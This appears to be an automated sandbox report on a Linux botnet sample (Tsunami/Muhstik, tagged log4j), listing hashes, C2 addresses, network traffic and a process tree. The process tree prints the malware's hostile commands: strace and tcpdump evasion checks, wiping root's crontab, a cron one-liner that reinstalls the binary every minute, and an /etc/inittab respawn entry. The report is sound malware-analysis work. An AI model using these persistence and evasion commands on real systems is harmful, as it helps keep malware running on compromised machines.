Linux Analysis Report pty4
Overview
General Information
Sample Name: | pty4 |
Analysis ID: | 544443 |
MD5: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
SHA1: | 0193f962cf141afd8be8d5d252ac7c2511138860 |
SHA256: | 601a9a769138a444dd359058dee0b4d797f8aef42d7c22dfb469bbaf55695ed6 |
Tags: | elflog4j |
Infos: |
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Classification
Analysis Advice |
---|
None of the HTTP servers contacted by the sample answered. The sample is likely an old dropper that no longer works |
None of the domains contacted by the sample resolved. The sample is likely an old dropper that no longer works |
General Information |
---|
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 544443 |
Start date: | 23.12.2021 |
Start time: | 11:26:08 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 47s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | pty4 |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Detection: | MAL |
Classification: | mal96.troj.evad.lin@0/23@2/0 |
Process Tree |
---|
|
Yara Overview |
---|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Tsunami | Yara detected Tsunami | Joe Security | ||
JoeSecurity_Muhstik | Yara detected Muhstik | Joe Security | ||
Jbx Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for submitted file |
Source: | Virustotal: |
Source: | ReversingLabs: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) |
Source: | Snort IDS: |
Uses IRC for communication with a C&C |
Source: | IRC traffic detected: |
Uses known network protocols on non-standard ports |
Source: | Network traffic detected: |
Source: | TCP traffic: |
Source: | DNS traffic detected: |
Source: | Network traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | Program segment: |
Source: | Classification label: |
Persistence and Installation Behavior: |
---|
Writes identical ELF files to multiple locations |
Source: | File with SHA-256 601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6 written: |
Sample tries to persist itself using cron |
Source: | File: |
Explicitly modifies time stamps using the "touch" command |
Source: | Touch executable uses timestamp modification options: |
Executes the "crontab" command typically for achieving persistence |
Source: | Crontab executable: |
Source: | File written: |
Source: | Grep executable: |
Source: | Crontab like entry written: |
Source: | Shell command executed: |
Source: | Rm executable: |
Source: | Touch executable: |
Source: | Stderr: cat: /etc/inittabno crontab for root: No such file or directoryno crontab for rootno crontab for root: |
Hooking and other Techniques for Hiding and Protection: |
---|
Uses known network protocols on non-standard ports |
Source: | Network traffic detected: |
Source: | Queries kernel information via 'uname': |
Stealing of Sensitive Information: |
---|
Yara detected Muhstik |
Source: | File source: |
Yara detected Tsunami |
Source: | File source: |
Remote Access Functionality: |
---|
Yara detected Muhstik |
Source: | File source: |
Yara detected Tsunami |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scheduled Task/Job11 | Scheduled Task/Job11 | Scheduled Task/Job11 | Scripting1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scripting1 | At (Linux)1 | At (Linux)1 | Timestomp1 | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux)1 | Logon Script (Windows) | Logon Script (Windows) | Indicator Removal on Host1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | File Deletion1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud |
Malware Configuration |
---|
No configs have been found |
---|
Behavior Graph |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
37% | Virustotal | Browse | ||
44% | ReversingLabs | Linux.Trojan.Tsunami |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
37% | Virustotal | Browse | ||
44% | ReversingLabs | Linux.Trojan.Tsunami | ||
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
l.deutschland-zahlung.net | unknown | unknown | true | unknown |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
198.8.91.14 | unknown | United States | 46562 | TOTAL-SERVER-SOLUTIONSUS | false | |
156.67.220.165 | unknown | Cyprus | 47583 | AS-HOSTINGERLT | true | |
23.95.222.119 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false | |
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Runtime Messages |
---|
Command: | /tmp/pty4 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | |
Standard Error: | cat: /etc/inittabno crontab for root : No such file or directory no crontab for root no crontab for root |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
156.67.220.165 | Get hash | malicious | Browse | ||
23.95.222.119 | Get hash | malicious | Browse | ||
109.202.202.202 | Get hash | malicious | Browse | ||
91.189.91.43 | Get hash | malicious | Browse | ||
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
TOTAL-SERVER-SOLUTIONSUS | Get hash | malicious | Browse |
AS-COLOCROSSINGUS | Get hash | malicious | Browse |
AS-HOSTINGERLT | Get hash | malicious | Browse |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | /usr/bin/cp |
File Type: | |
Category: | dropped |
Size (bytes): | 44884 |
Entropy (8bit): | 7.871246036237381 |
Encrypted: | false |
SSDEEP: | 768:cZTk9P23xGPDvLOXiRdBnM0dvdkGhLergvR32OKfFzs3DUtyzxWHmVXHAm:QTk9AxGPjUi1M+vdkGhS8vRIFo3DUU1p |
MD5: | 7B4F1C79F1EDCB6B36A92DEBD5A81B96 |
SHA1: | 0193F962CF141AFD8BE8D5D252AC7C2511138860 |
SHA-256: | 601A9A769138A444DD359058DEE0B4D797F8AEF42D7C22DFB469BBAF55695ED6 |
SHA-512: | D4CDC2897A6E22E1F8A246BFDBAC358DEBE8E48DA4B74E6B0ABD45F3EED8B0EC44EA50C2344C84325CAE13E70019023ACD99872C772B5F6F0BCEF67A6CAFA1CF |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Process: | /usr/bin/cat |
File Type: | |
Category: | dropped |
Size (bytes): | 142 |
Entropy (8bit): | 4.326664977926882 |
Encrypted: | false |
SSDEEP: | 3:IQfXzstufXPXzsm3V6vVfXPXzsqsRufXPXzsqjKYbfXPXzsqz:IQr/x3+V/I8/rb/f |
MD5: | BD60346A01F1B4BDE9993A6BAA8183A2 |
SHA1: | EC6A317AD472790B18D0B662AC6992E226041C3E |
SHA-256: | 53ACA2A49A912146645BBB47D0ABB1827520434ABB907CADF77BC55B2572B099 |
SHA-512: | C960E7D898096547CECEE2376226203F2EF9AE88185B6AD52A4ECAC742AA60C1EA699FC167A86201B9BC0102F029ACC296C8A7BCD4E9F5793D5310CDB4FAA098 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | /bin/sh |
File Type: | |
Category: | dropped |
Size (bytes): | 29 |
Entropy (8bit): | 4.090234012145145 |
Encrypted: | false |
SSDEEP: | 3:IQfXzsqz:IQP |
MD5: | D36AF1B2908091A8DCAADAED98DC9460 |
SHA1: | 47189FCB10685324FAA8DEF45669F784444479BB |
SHA-256: | 79A96E3165984BE3826784DA22D53CFCA134C75E87E394D3A35876FBEEEA610C |
SHA-512: | 88BBCD7A72A8869652D7BEC1C0262B6896B9A5C9AFFB8AD2A78BAF5C90079D5B01AECD2DFCC7F13010FBCC8C4B73A097822C804640493D197319E008D1C00228 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 387 |
Entropy (8bit): | 4.8972080073755855 |
Encrypted: | false |
SSDEEP: | 12:8QjHig8pXVDeHLU9YumqzKMmq16mq05mqQY:8+2DALUqPqIq5q9qf |
MD5: | 0AEEA9C0CF1E605D1C32C770116811FA |
SHA1: | 2DB529A7F9B104A2D588DBD01309EA1173963B9D |
SHA-256: | 3AD0DF9C8F1EE0B623BD038808DFCA647D05878956C71766B24DCE153A0C2A13 |
SHA-512: | 9267EC2B2A1F4FF3BF15CDAF4C4CD161D321883BBBED8F6EE92ECBB3D5571AB2A38F04D8E8811541CC6E8872A97DD5A3F6B915D5E786AB2BDCCBBC354496A12F |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 214 |
Entropy (8bit): | 5.119840870160048 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQL/ZdGMQ5UYLtCFt39YBC0AgFz:8QjHig81deHLU9YuY |
MD5: | F27B5E9C1AD82B55B346A8CAC385FA8C |
SHA1: | D525DDB3972D3589F4F03154DC839799F332D157 |
SHA-256: | EC12A6E3E3E41E379EE2715C9BFB8BF1FDF7E2D8427D15FB7012442C9CA80464 |
SHA-512: | B5824E77F18E936D58097FE46D422ADE8777DA458808C31F579C93F06D3D3208B07848F8463C49C68F93F5CEC46402EF508518C830E538CDCA3021A65D878908 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 257 |
Entropy (8bit): | 5.077584953913084 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQL//dGMQ5UYLtCFt39YBC0AgF5qzK3Ub0AgFz:8QjHig8heHLU9YumqzKMY |
MD5: | C0FB58CBA6DD21C6860D1C23673EB946 |
SHA1: | 3F14C66521E981207DE24838D91AB228D91EA30C |
SHA-256: | 0917CC44A428CE6C88894AC23565DC4DB23CE7C92D157116EF8C26B8750DB12F |
SHA-512: | 3038502C39EF45F0126E0B280E0F6DBB8EC732989A448E8E217EF07F8448FD25A3AE5EB23EBD0DB7A7D0F8A871E8D71FA55BC50015D9BC3B357C7AA445C9AC96 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.01078377746558 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQL//dGMQ5UYLtCFt39YBC0AgF5qzK3Ub0AgF5qIajUa:8QjHig8heHLU9YumqzKMmq16Y |
MD5: | C0ADE17573AD8481FDC7E1F42CD4BD33 |
SHA1: | 9C697B102CCE78F6605515A2F8EA3C26FD960457 |
SHA-256: | A560BE928DB6B7BD572FB8CC31C04E33A72B833827313F6AC01C3A5FB2D6A4F3 |
SHA-512: | E951E5C9391D0F9C3B22EDBF5035F6285AFD8EB47FC2885D5CD2985A0FE785D254C520BE443F7263308B6C5A1FBFE6F43FA65EB0996916EB219856CEC8F201E9 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 4.959384391149962 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQL/lXVX/GMQ5UYLtCFt39YBC0AgF5qzK3Ub0AgF5qIF:8QjHig8pXVDeHLU9YumqzKMmq16mq05Y |
MD5: | F5AE8DD3B579745556ECFDCF7BE4139C |
SHA1: | 820F1CF68D965E66428285BFF491AD4B3CE59780 |
SHA-256: | 94A9BD464AAFC4BD4FE1C510BA9886E7647F4AFF3C9F7D7329A4AE3A4F1BEE74 |
SHA-512: | 3E3215B0477376062F31DE72FBDFE9D9BFA6387E4ADFA41BF54B79997CC1CE6FBDE96717B151BBCF3BB9C488704E916C5EE8B64AE0AF56B6B1EB51E4C25EF955 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.871246036237381 |
TrID: |
|
File name: | pty4 |
File size: | 44884 |
MD5: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
SHA1: | 0193f962cf141afd8be8d5d252ac7c2511138860 |
SHA256: | 601a9a769138a444dd359058dee0b4d797f8aef42d7c22dfb469bbaf55695ed6 |
SHA512: | d4cdc2897a6e22e1f8a246bfdbac358debe8e48da4b74e6b0abd45f3eed8b0ec44ea50c2344c84325cae13e70019023acd99872c772b5f6f0bcef67a6cafa1cf |
SSDEEP: | 768:cZTk9P23xGPDvLOXiRdBnM0dvdkGhLergvR32OKfFzs3DUtyzxWHmVXHAm:QTk9AxGPjUi1M+vdkGhS8vRIFo3DUU1p |
File Content Preview: | .ELF....................p...4...........4. ...(......................................................................................j...j......a........?d..ELF.......d...m...4..h.. .(.....~m..-.#..5...c...............m.$..R...Q.td................H.45.... |
Static ELF Info |
---|
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | |
Entry Point Address: | |
Flags: | |
ELF Header Size: | |
Program Header Offset: | |
Program Header Size: | |
Number of Program Headers: | |
Section Header Offset: | |
Section Header Size: | |
Number of Section Headers: | |
Header String Table Index: |
Program Segments |
---|
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0xc01000 | 0xc01000 | 0xadec | 0xadec | 4.4178 | 0x5 | R E | 0x1000 | ||
LOAD | 0x7e4 | 0x80617e4 | 0x80617e4 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x1000 |
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
12/23/21-11:26:58.030802 | TCP | 2034743 | ET TROJAN ELF/Muhstik Botnet CnC Activity | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 23, 2021 11:26:53.253879070 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Dec 23, 2021 11:26:53.765599012 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Dec 23, 2021 11:26:55.993947029 CET | 48042 | 8080 | 192.168.2.23 | 198.8.91.14 |
Dec 23, 2021 11:26:56.115650892 CET | 8080 | 48042 | 198.8.91.14 | 192.168.2.23 |
Dec 23, 2021 11:26:56.994074106 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:57.270119905 CET | 8080 | 48714 | 156.67.220.165 | 192.168.2.23 |
Dec 23, 2021 11:26:57.271761894 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:58.030802011 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:58.307034969 CET | 8080 | 48714 | 156.67.220.165 | 192.168.2.23 |
Dec 23, 2021 11:26:58.307251930 CET | 8080 | 48714 | 156.67.220.165 | 192.168.2.23 |
Dec 23, 2021 11:26:58.307327986 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:58.310981035 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:58.587162018 CET | 8080 | 48714 | 156.67.220.165 | 192.168.2.23 |
Dec 23, 2021 11:26:58.587241888 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:58.588644028 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:58.904227972 CET | 8080 | 48714 | 156.67.220.165 | 192.168.2.23 |
Dec 23, 2021 11:26:58.904376984 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:59.180529118 CET | 8080 | 48714 | 156.67.220.165 | 192.168.2.23 |
Dec 23, 2021 11:26:59.180576086 CET | 8080 | 48714 | 156.67.220.165 | 192.168.2.23 |
Dec 23, 2021 11:26:59.181150913 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:27:08.101514101 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Dec 23, 2021 11:27:20.389602900 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Dec 23, 2021 11:27:24.485449076 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Dec 23, 2021 11:27:49.061294079 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Dec 23, 2021 11:28:09.829783916 CET | 777 | 48812 | 23.95.222.119 | 192.168.2.23 |
Dec 23, 2021 11:28:09.830014944 CET | 48812 | 777 | 192.168.2.23 | 23.95.222.119 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 23, 2021 11:26:55.924426079 CET | 47783 | 53 | 192.168.2.23 | 1.1.1.1 |
Dec 23, 2021 11:26:55.976707935 CET | 53 | 47783 | 1.1.1.1 | 192.168.2.23 |
Dec 23, 2021 11:26:55.977072001 CET | 47783 | 53 | 192.168.2.23 | 1.1.1.1 |
Dec 23, 2021 11:26:55.993489027 CET | 53 | 47783 | 1.1.1.1 | 192.168.2.23 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Dec 23, 2021 11:26:55.924426079 CET | 192.168.2.23 | 1.1.1.1 | 0x2e6a | Standard query (0) | | A (IP address) | IN (0x0001) |
Dec 23, 2021 11:26:55.977072001 CET | 192.168.2.23 | 1.1.1.1 | 0x2e6a | Standard query (0) | | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Dec 23, 2021 11:26:55.976707935 CET | 1.1.1.1 | 192.168.2.23 | 0x2e6a | Name error (3) | | none | none | A (IP address) | IN (0x0001) |
Dec 23, 2021 11:26:55.993489027 CET | 1.1.1.1 | 192.168.2.23 | 0x2e6a | Name error (3) | | none | none | A (IP address) | IN (0x0001) |
IRC Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Dec 23, 2021 11:26:58.030802011 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 | |
Dec 23, 2021 11:26:58.904376984 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 | |
System Behavior |
---|
General |
---|
Start time: | 11:26:48 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | /tmp/pty4 |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:48 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:48 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "pidof -x strace > /dev/null" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:48 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:48 |
Start date: | 23/12/2021 |
Path: | /usr/bin/pidof |
Arguments: | pidof -x strace |
File size: | 27016 bytes |
MD5 hash: | f58f67968fc50f1497f9ea9e9c22b6e8 |
General |
---|
Start time: | 11:26:51 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:51 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "pidof -x tcpdump > /dev/null" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:51 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:51 |
Start date: | 23/12/2021 |
Path: | /usr/bin/pidof |
Arguments: | pidof -x tcpdump |
File size: | 27016 bytes |
MD5 hash: | f58f67968fc50f1497f9ea9e9c22b6e8 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "crontab -r" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -r |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "crontab -l | grep /tmp/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty4 > /dev/null 2>&1 &\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep /tmp/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v "no cron" |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab | grep -v \"/tmp/pty4\" > /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v /tmp/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "echo \"0:2345:respawn:/tmp/pty4\" >> /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab2 > /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab2 |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "rm -rf /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
